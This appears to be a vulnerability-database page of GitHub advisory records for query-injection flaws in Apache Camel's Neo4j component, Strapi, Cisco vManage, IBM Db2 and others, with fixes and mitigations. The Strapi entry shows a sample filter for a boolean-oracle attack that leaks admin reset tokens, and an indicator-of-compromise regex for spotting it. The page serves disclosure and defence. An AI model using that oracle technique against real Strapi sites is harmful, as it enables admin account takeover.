Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-46591"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-06T09:16:37Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Special Elements in Data Query Logic vulnerability in Apache Camel Neo4J component.\n\nThe camel-neo4j producer builds the Cypher WHERE clause for its match/retrieve and delete operations from the CamelNeo4jMatchProperties map. CVE-2025-66169 addressed Cypher injection through the property values by binding them as query parameters ($paramN), but the property names (the JSON keys of that map) were still concatenated into the query string verbatim in Neo4jProducer.retrieveNodes() and deleteNode(). A property name containing Cypher syntax therefore alters the structure of the executed query. Where a route maps untrusted input into the CamelNeo4jMatchProperties map - for example by passing a request body as the match map, or from a consumer that does not filter inbound Camel* headers - an attacker who controls the JSON key names can inject arbitrary Cypher and read, modify or delete any node or relationship in the Neo4j database. The CamelNeo4jMatchProperties header is itself Camel-prefixed and is filtered by the HTTP header-filter strategy, so a plain HTTP client cannot set it directly; the issue is reachable through routes that deliberately or inadvertently carry untrusted data into that header.\nThis issue affects Apache Camel: from 4.10.0 before 4.14.8, from 4.15.0 before 4.18.3, from 4.19.0 before 4.21.0.\n\nUsers are recommended to upgrade to version 4.21.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.8. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.3. For deployments that cannot upgrade immediately, do not populate the CamelNeo4jMatchProperties map from untrusted input: validate or allow-list the property names (for example against ^[A-Za-z_][A-Za-z0-9_]*$) before the Neo4j producer, and ensure that any consumer feeding such a route filters inbound Camel* / camel* headers so the match header cannot be supplied by an external sender.",
  "id": "GHSA-q86m-qjpm-vqcw",
  "modified": "2026-07-06T21:30:36Z",
  "published": "2026-07-06T09:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46591"
    },
    {
      "type": "WEB",
      "url": "https://camel.apache.org/security/CVE-2026-46591.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QJ6X-MQQF-CV4Q

Vulnerability from github – Published: 2022-05-24 17:39 – Updated: 2022-09-21 00:00
VLAI
Details

A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-1349"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-01-20T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "\n A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system.\n The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information.\n ",
  "id": "GHSA-qj6x-mqqf-cv4q",
  "modified": "2022-09-21T00:00:42Z",
  "published": "2022-05-24T17:39:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1349"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QRW6-CMHG-G5P6

Vulnerability from github – Published: 2024-08-14 18:32 – Updated: 2025-11-04 18:31
VLAI
Details

IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) federated server 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query under certain conditions. IBM X-Force ID: 291307.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-35136"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-14T18:15:11Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) federated server 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted query under certain conditions.  IBM X-Force ID:  291307.",
  "id": "GHSA-qrw6-cmhg-g5p6",
  "modified": "2025-11-04T18:31:17Z",
  "published": "2024-08-14T18:32:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35136"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/291307"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240912-0003"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7165341"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RC2J-XVRX-6GQJ

Vulnerability from github – Published: 2022-05-13 01:14 – Updated: 2025-04-20 03:43
VLAI
Details

Improper Neutralization of Special Elements used in an OS Command in bookmarking function of Newsbeuter versions 0.7 through 2.9 allows remote attackers to perform user-assisted code execution by crafting an RSS item that includes shell code in its title and/or URL.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-12904"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-08-23T14:29:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Special Elements used in an OS Command in bookmarking function of Newsbeuter versions 0.7 through 2.9 allows remote attackers to perform user-assisted code execution by crafting an RSS item that includes shell code in its title and/or URL.",
  "id": "GHSA-rc2j-xvrx-6gqj",
  "modified": "2025-04-20T03:43:45Z",
  "published": "2022-05-13T01:14:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12904"
    },
    {
      "type": "WEB",
      "url": "https://github.com/akrennmair/newsbeuter/issues/591"
    },
    {
      "type": "WEB",
      "url": "https://github.com/akrennmair/newsbeuter/commit/96e9506ae9e252c548665152d1b8968297128307"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/forum/#!topic/newsbeuter/iFqSE7Vz-DE"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/forum/#%21topic/newsbeuter/iFqSE7Vz-DE"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4585-1"
    },
    {
      "type": "WEB",
      "url": "http://www.debian.org/security/2017/dsa-3947"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RJG2-95X7-8QMX

Vulnerability from github – Published: 2026-05-14 13:17 – Updated: 2026-05-15 23:44
VLAI
Summary
Strapi may leak sensitive data via relational filtering due to lack of query sanitization
Details

Summary of CVE-2026-27886 Vulnerability Details

  • CVE: CVE-2026-27886
  • CVSS v3.1 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N (9.3 — Critical)
  • Affected Versions: @strapi/strapi <=5.36.1
  • How to Patch: Immediately update your Strapi to >=5.37.0

Description of CVE-2026-27886

Strapi versions prior to 5.37.0 did not sufficiently sanitize query parameters when filtering content via relational fields. An unauthenticated attacker could use the where query parameter on any publicly-accessible content-type with an updatedBy (or other admin-relation) field to perform a boolean-oracle attack against private fields on the joined admin_users table, including the resetPasswordToken field. Extracting an admin reset token via this oracle made full administrative account takeover possible without authentication.

When a filter such as where[updatedBy][resetPasswordToken][$startsWith]=a was applied to a public Content API endpoint, the underlying query generation performed a LEFT JOIN against the admin_users table and emitted a WHERE clause referencing the joined column. The query parameter sanitization layer did not block operator chains that traversed into relational target schemas the caller had no read permission on, allowing the response count to be used as a one-bit oracle on any admin-table field.

The patch introduces explicit query-parameter sanitization at the controller and service boundary via three new primitives: strictParam, addQueryParams, and addBodyParams. Operator chains that traverse into restricted relational targets are now rejected before reaching the database.

IoC's for CVE-2026-27886

Indicators that an instance running an unpatched version may have been exploited:

  • Server access logs containing query strings traversing into admin-relation private fields. Regex: \?(.*&)?where\[(updatedBy|createdBy|publishedBy)\]\[(email|password|resetPasswordToken|confirmationToken|firstname|lastname|preferedLanguage)\]\[\$(startsWith|contains|eq|gt|lt|ge|le|in|notIn|notNull|null)\]=
  • High volume of public Content API requests from a single IP iterating through a hex alphabet (0-9, a-f) on the same content-type endpoint with progressively-longer filter values
  • Subsequent POST /admin/reset-password calls using a reset token that the legitimate admin did not request
  • Successful admin password change immediately following a burst of public Content API requests with where[updatedBy] query parameters
  • Sustained burst of identical-shape requests with only the trailing character of the filter value varying

Credit

Discovered by: James Doll - WildWest CyberSecurity Contact: cve+2026-27886@wildwestcyber.com Website: https://wildwestcyber.com LinkedIn: https://www.linkedin.com/in/james-doll-273a61243

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/strapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.37.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27886"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-22",
      "CWE-943"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T13:17:58Z",
    "nvd_published_at": "2026-05-14T19:16:31Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary of CVE-2026-27886 Vulnerability Details\n\n- CVE: CVE-2026-27886\n- CVSS v3.1 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N` (9.3 \u2014 Critical)\n- Affected Versions: `@strapi/strapi` \u003c=5.36.1\n- How to Patch: Immediately update your Strapi to \u003e=5.37.0\n\n### Description of CVE-2026-27886\n\nStrapi versions prior to 5.37.0 did not sufficiently sanitize query parameters when filtering content via relational fields. An unauthenticated attacker could use the `where` query parameter on any publicly-accessible content-type with an `updatedBy` (or other admin-relation) field to perform a boolean-oracle attack against private fields on the joined `admin_users` table, including the `resetPasswordToken` field. Extracting an admin reset token via this oracle made full administrative account takeover possible without authentication.\n\nWhen a filter such as `where[updatedBy][resetPasswordToken][$startsWith]=a` was applied to a public Content API endpoint, the underlying query generation performed a `LEFT JOIN` against the `admin_users` table and emitted a `WHERE` clause referencing the joined column. The query parameter sanitization layer did not block operator chains that traversed into relational target schemas the caller had no read permission on, allowing the response count to be used as a one-bit oracle on any admin-table field.\n\nThe patch introduces explicit query-parameter sanitization at the controller and service boundary via three new primitives: `strictParam`, `addQueryParams`, and `addBodyParams`. Operator chains that traverse into restricted relational targets are now rejected before reaching the database.\n\n### IoC\u0027s for CVE-2026-27886\n\nIndicators that an instance running an unpatched version may have been exploited:\n\n- Server access logs containing query strings traversing into admin-relation private fields. Regex: `\\?(.*\u0026)?where\\[(updatedBy|createdBy|publishedBy)\\]\\[(email|password|resetPasswordToken|confirmationToken|firstname|lastname|preferedLanguage)\\]\\[\\$(startsWith|contains|eq|gt|lt|ge|le|in|notIn|notNull|null)\\]=`\n- High volume of public Content API requests from a single IP iterating through a hex alphabet (`0`-`9`, `a`-`f`) on the same content-type endpoint with progressively-longer filter values\n- Subsequent `POST /admin/reset-password` calls using a reset token that the legitimate admin did not request\n- Successful admin password change immediately following a burst of public Content API requests with `where[updatedBy]` query parameters\n- Sustained burst of identical-shape requests with only the trailing character of the filter value varying\n\n### Credit\nDiscovered by: James Doll - WildWest CyberSecurity\nContact: cve+2026-27886@wildwestcyber.com\nWebsite: https://wildwestcyber.com\nLinkedIn: https://www.linkedin.com/in/james-doll-273a61243",
  "id": "GHSA-rjg2-95x7-8qmx",
  "modified": "2026-05-15T23:44:50Z",
  "published": "2026-05-14T13:17:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-rjg2-95x7-8qmx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27886"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/strapi/strapi"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Strapi may leak sensitive data via relational filtering due to lack of query sanitization"
}

GHSA-RM86-2RM3-62G8

Vulnerability from github – Published: 2025-07-29 21:30 – Updated: 2025-07-29 21:30
VLAI
Details

IBM Db2 for Linux 12.1.0, 12.1.1, and 12.1.2

is vulnerable to denial of service with a specially crafted query under certain non-default conditions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-33114"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-29T19:15:45Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 for Linux 12.1.0, 12.1.1, and 12.1.2 \n\n\n\nis vulnerable to denial of service with a specially crafted query under certain non-default conditions.",
  "id": "GHSA-rm86-2rm3-62g8",
  "modified": "2025-07-29T21:30:44Z",
  "published": "2025-07-29T21:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33114"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7240943"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-V5XX-3HCF-FM67

Vulnerability from github – Published: 2026-07-06 18:31 – Updated: 2026-07-07 21:31
VLAI
Details

A high-severity vulnerability exists in a web application component of BeyondTrust Remote Support and Privileged Remote Access related to the processing of certain input parameters. Insufficient validation of user-supplied input may allow an authenticated attacker with limited privileges to access unintended resources or data beyond their authorization scope. Exploitation is restricted to accounts with specific permissions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-40141"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-943"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-06T17:16:31Z",
    "severity": "HIGH"
  },
  "details": "A high-severity vulnerability exists in a web application component of BeyondTrust Remote Support and Privileged Remote Access related to the processing of certain input parameters.\u00a0Insufficient validation of user-supplied input may allow an authenticated attacker with limited privileges to access unintended resources or data beyond their authorization scope. Exploitation is restricted to accounts with specific permissions.",
  "id": "GHSA-v5xx-3hcf-fm67",
  "modified": "2026-07-07T21:31:30Z",
  "published": "2026-07-06T18:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40141"
    },
    {
      "type": "WEB",
      "url": "https://www.beyondtrust.com/trust-center/security-advisories/bt26-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-676: NoSQL Injection

An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.